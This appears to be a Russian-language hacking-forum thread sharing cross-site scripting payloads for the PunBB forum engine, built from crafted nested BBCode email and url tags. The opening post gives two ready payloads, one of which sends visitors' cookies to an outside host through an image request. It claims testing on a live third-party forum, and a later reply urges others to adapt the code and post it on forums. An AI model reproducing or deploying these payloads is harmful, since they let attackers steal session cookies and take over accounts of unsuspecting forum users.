|
XSS в PunBB (вложеные теги)
Нашел вложеные теги, сделал видео.
1. Код:
[еmail=[urл=s=`]a[/urл]]a[/еmail]`xss=`alert(document.cookie);this.xss=null` style=top:expression(eval(this.xss));Код:
[еmail=[urл=s=`]a[/urл]]a[/еmail]`xss=`i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null` style=top:expression(eval(this.xss));Перепешите А НЕ КОПИРУЙТЕ ТЕКСТ! Проверялось на http://region59.com/forum - между прочим хороший варез - сайт |
Блин, матерые какие-то у тебя XSS-inj.. Я ещё не проверял, но имхо можно было бы сделать и короче. Хотя, хз, посмотрим...........
Кстати, а где видео? Если записал, почему ещё не вывесил? |
KEZ ты хотел сказать спаренные теги а не вложенные правда?
Нет там вложенных тегов у тебя есть спаренные. :rolleyes: |
Мои теги САМЫЕ простые. Проще некуда. Теги+baclslash и все. Проше незя.
Видео сделал. Вложеные теги = спареные теги. |
Видео уже вывесил.
А вот насчет тегов - там все проще некуда |
Спасибо Kez. Ты дал мне ответ на одну проблемму с которой я мучился целых два дня!
|
Цитата:
|
Отредактируй код под нужный тебе вставь с сообщение на форуме
|
| Время: 22:28 |